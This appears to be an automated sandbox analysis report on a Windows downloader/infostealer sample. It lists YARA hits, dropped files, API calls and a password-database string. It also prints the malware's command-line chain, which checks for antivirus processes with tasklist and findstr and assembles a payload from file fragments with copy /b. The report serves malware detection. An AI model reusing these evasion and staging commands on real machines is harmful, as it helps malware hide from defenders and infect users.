Code function: 14_2_00589FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

14_2_00589FD2

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.CLaYpUL3zw.exe.5d0000.0.unpack, type: UNPACKEDPE

Matched rule: Detects downloader / injector Author: ditekSHen

PE file contains section with special chars

Source: CLaYpUL3zw.exe	Static PE information: section name:
Source: CLaYpUL3zw.exe	Static PE information: section name: .idata
Source: CLaYpUL3zw.exe	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_00564763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,

14_2_00564763

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_00551B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

14_2_00551B4D

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 2_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,		2_2_004038AF
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_0055F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		14_2_0055F20D

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	File created: C:\Windows\UtilitySoccer	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	File created: C:\Windows\MoveRefurbished	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	File created: C:\Windows\ClarkWriter	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 2_2_0040737E	2_2_0040737E
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 2_2_00406EFE	2_2_00406EFE
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 2_2_004079A2	2_2_004079A2
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 2_2_004049A8	2_2_004049A8
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B526FB	3_3_00B526FB
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B526FB	3_3_00B526FB
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B526FB	3_3_00B526FB
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B526FB	3_3_00B526FB
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B526FB	3_3_00B526FB
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5275D	3_3_00B5275D
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5275D	3_3_00B5275D
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5275D	3_3_00B5275D
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5275D	3_3_00B5275D
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5275D	3_3_00B5275D
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B526FB	3_3_00B526FB
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B526FB	3_3_00B526FB
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B526FB	3_3_00B526FB
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B526FB	3_3_00B526FB
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B526FB	3_3_00B526FB
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5275D	3_3_00B5275D
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5275D	3_3_00B5275D
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5275D	3_3_00B5275D
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5275D	3_3_00B5275D
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5275D	3_3_00B5275D
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B526FB	3_3_00B526FB
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B526FB	3_3_00B526FB
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B526FB	3_3_00B526FB
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B526FB	3_3_00B526FB
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B526FB	3_3_00B526FB
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5275D	3_3_00B5275D
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5275D	3_3_00B5275D
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5275D	3_3_00B5275D
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5275D	3_3_00B5275D
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5275D	3_3_00B5275D
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B526FB	3_3_00B526FB
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B526FB	3_3_00B526FB
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B526FB	3_3_00B526FB
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B526FB	3_3_00B526FB
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B526FB	3_3_00B526FB
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5275D	3_3_00B5275D
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5275D	3_3_00B5275D
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5275D	3_3_00B5275D
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5275D	3_3_00B5275D
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5275D	3_3_00B5275D
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B526FB	3_3_00B526FB
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B526FB	3_3_00B526FB
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B526FB	3_3_00B526FB
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B526FB	3_3_00B526FB
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B526FB	3_3_00B526FB
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5275D	3_3_00B5275D
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5275D	3_3_00B5275D
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5275D	3_3_00B5275D
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5275D	3_3_00B5275D
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_00B5275D	3_3_00B5275D
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00518017	14_2_00518017
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_0050E144	14_2_0050E144
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004FE1F0	14_2_004FE1F0
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_0052A26E	14_2_0052A26E
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004F22AD	14_2_004F22AD
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_005122A2	14_2_005122A2
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_0050C624	14_2_0050C624
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_0052E87F	14_2_0052E87F
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_0057C8A4	14_2_0057C8A4
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00562A05	14_2_00562A05
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00526ADE	14_2_00526ADE
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00558BFF	14_2_00558BFF
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_0050CD7A	14_2_0050CD7A
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_0051CE10	14_2_0051CE10
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00527159	14_2_00527159
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004F9240	14_2_004F9240
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00585311	14_2_00585311
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004F96E0	14_2_004F96E0
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00511704	14_2_00511704
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00511A76	14_2_00511A76
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004F9B60	14_2_004F9B60
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00517B8B	14_2_00517B8B
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00511D20	14_2_00511D20
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00517DBA	14_2_00517DBA
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00511FE7	14_2_00511FE7

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\768400\Climb.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: String function: 00510DA0 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: String function: 0050FD52 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: String function: 004062CF appears 57 times

Source: CLaYpUL3zw.exe, 00000000.00000002.2262206337.00000000054F0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameladdad.exe4 vs CLaYpUL3zw.exe
Source: CLaYpUL3zw.exe, 00000000.00000002.2258493928.0000000000D62000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameladdad.exe4 vs CLaYpUL3zw.exe
Source: CLaYpUL3zw.exe, 00000000.00000002.2260643842.00000000016AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs CLaYpUL3zw.exe
Source: CLaYpUL3zw.exe	Binary or memory string: OriginalFilenameladdad.exe4 vs CLaYpUL3zw.exe

Source: CLaYpUL3zw.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.CLaYpUL3zw.exe.5d0000.0.unpack, type: UNPACKEDPE

Matched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector

Source: CLaYpUL3zw.exe

Static PE information: Section: uppnmxuj ZLIB complexity 0.9946467484394031

Source: Set-up.exe.0.dr

Binary string: Lntdll.dllNtCreateFileNtDeviceIoControlFileNtCancelIoFileEx\Device\Afd

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@28/23@10/3

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_005641FA GetLastError,FormatMessageW,

14_2_005641FA

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00552010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		14_2_00552010
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00551A0B AdjustTokenPrivileges,CloseHandle,		14_2_00551A0B

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

2_2_004044D1

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_0055DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

14_2_0055DD87

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

Code function: 2_2_004024FB CoCreateInstance,

2_2_004024FB

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_00563A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

14_2_00563A0E

Source: C:\Users\user\Desktop\CLaYpUL3zw.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CLaYpUL3zw.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6324:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Mutant created: \Sessions\1\BaseNamedObjects\My_mutex

Source: C:\Users\user\Desktop\CLaYpUL3zw.exe

File created: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

Jump to behavior

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\CLaYpUL3zw.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\CLaYpUL3zw.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Climb.com, 0000000E.00000003.2537346329.00000000044A3000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2512597929.00000000045AE000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2512758333.00000000044A5000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2538857681.00000000045D3000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: CLaYpUL3zw.exe	Virustotal: Detection: 52%
Source: CLaYpUL3zw.exe	ReversingLabs: Detection: 50%

Source: CLaYpUL3zw.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: CLaYpUL3zw.exe	String found in binary or memory: 3The file %s is missing. Please, re-install this application

Source: unknown	Process created: C:\Users\user\Desktop\CLaYpUL3zw.exe "C:\Users\user\Desktop\CLaYpUL3zw.exe"
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Process created: C:\Users\user\AppData\Local\Temp\PasoCattle.exe "C:\Users\user\AppData\Local\Temp\PasoCattle.exe"
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Process created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe"
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 768400
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Reflect
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "cocks" Articles
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled V
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\768400\Climb.com Climb.com V
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Process created: C:\Users\user\AppData\Local\Temp\PasoCattle.exe "C:\Users\user\AppData\Local\Temp\PasoCattle.exe"	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Process created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 768400	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Reflect	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "cocks" Articles	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled V	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\768400\Climb.com Climb.com V	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: winrnr.dll	Jump to behavior
